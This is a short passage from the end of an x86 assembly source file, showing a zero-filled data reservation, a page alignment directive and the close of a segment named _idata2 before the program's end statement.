		dd 80h dup(0)
		align 1000h
_idata2		ends


		end start